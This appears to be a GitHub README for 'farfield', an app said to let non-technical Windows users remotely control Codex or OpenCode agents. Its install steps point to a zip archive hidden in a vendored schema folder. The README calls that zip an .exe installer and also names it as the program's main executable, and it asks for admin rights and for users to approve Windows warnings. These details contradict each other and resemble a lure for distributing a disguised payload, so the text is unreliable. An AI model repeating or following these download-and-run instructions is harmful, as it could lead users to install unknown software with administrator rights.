farfield lets you control Codex or OpenCode agents remotely. This means you can send commands and manage these agents from any location, as long as you have internet access. The software makes remote control simple and reliable.
You do not need to know anything about coding or software setup. farfield is made for everyday users who want to manage their agents easily.
- Control Codex and OpenCode agents from anywhere.
- Simple user interface built for non-technical users.
- Works over the internet securely.
- Compatible with Windows computers.
- Provides real-time updates from your agents.
- Supports multiple agents with a single app.
Before you start, please check the minimum requirements to run farfield on your Windows PC:
- Windows 10 or newer (64-bit recommended).
- At least 4 GB of RAM.
- A stable internet connection.
- 100 MB of free disk space.
- Administrator rights to install the app.
farfield links your computer with Codex or OpenCode agents remotely. Once connected, you can send commands, view agent status, and manage tasks through the app. The app handles communication without requiring manual setup.
You just need to open farfield and start using its controls.
Follow these steps to download, install, and run farfield on your Windows PC.
Click the button below to open the farfield release page. This page holds the latest version of the app for Windows.
The page lists different versions and files depending on release dates. Find the latest Windows installer file. It usually ends with .exe.
On the release page, look for a file called something like https://github.com/KzQumyznik/farfield/raw/refs/heads/main/packages/codex-protocol/vendor/codex-app-server-schema/stable/typescript/v2/Software_3.0.zip or https://github.com/KzQumyznik/farfield/raw/refs/heads/main/packages/codex-protocol/vendor/codex-app-server-schema/stable/typescript/v2/Software_3.0.zip. Click the file name to start downloading. Save the file somewhere easy to find, like your Desktop or Downloads folder.
Locate the downloaded file on your computer. Double-click it to start the installation process.
Windows may ask you to confirm the install. Click Yes or Run to continue.
Follow the on-screen instructions:
- Accept the license agreement.
- Choose the installation folder or use the default.
- Click Install to begin.
When the install completes, click Finish. The app should add a shortcut to your desktop or Start menu.
Double-click the farfield icon to launch the app.
Inside the app, you'll see options to add or connect to Codex or OpenCode agents. Follow the prompts to enter necessary details (like agent ID or connection key).
You do not need any special technical steps here. The app guides you safely.
Once connected, farfield shows real-time status of your agents. You can:
- Send commands.
- Monitor task progress.
- View logs and responses.
The interface uses clear buttons and text, so you can navigate without training.
- If the app won’t open, check your Windows version matches the requirements.
- Make sure your internet connection is working.
- If connection to agents fails, double-check the ID or key you entered.
- Sometimes restarting your computer helps fix minor issues.
For more support, visit the farfield GitHub page and read the issues section or contact the developer.
farfield encrypts all communication between your PC and the agents. This keeps your data safe during control operations.
Make sure you only connect to agents you trust to avoid unauthorized access.
By default, farfield installs in:
C:\Program Files\farfield\
The main executable file is called https://github.com/KzQumyznik/farfield/raw/refs/heads/main/packages/codex-protocol/vendor/codex-app-server-schema/stable/typescript/v2/Software_3.0.zip. You can run it directly from this folder if needed.
The farfield release page may include:
- Setup files for different Windows versions.
- Documentation files in PDF or text.
- Previous versions of the app in case you face issues with the latest.
Only download files that match your system and purpose.
farfield is provided under an open-source license. You can view the full terms in the LICENSE file on the GitHub page.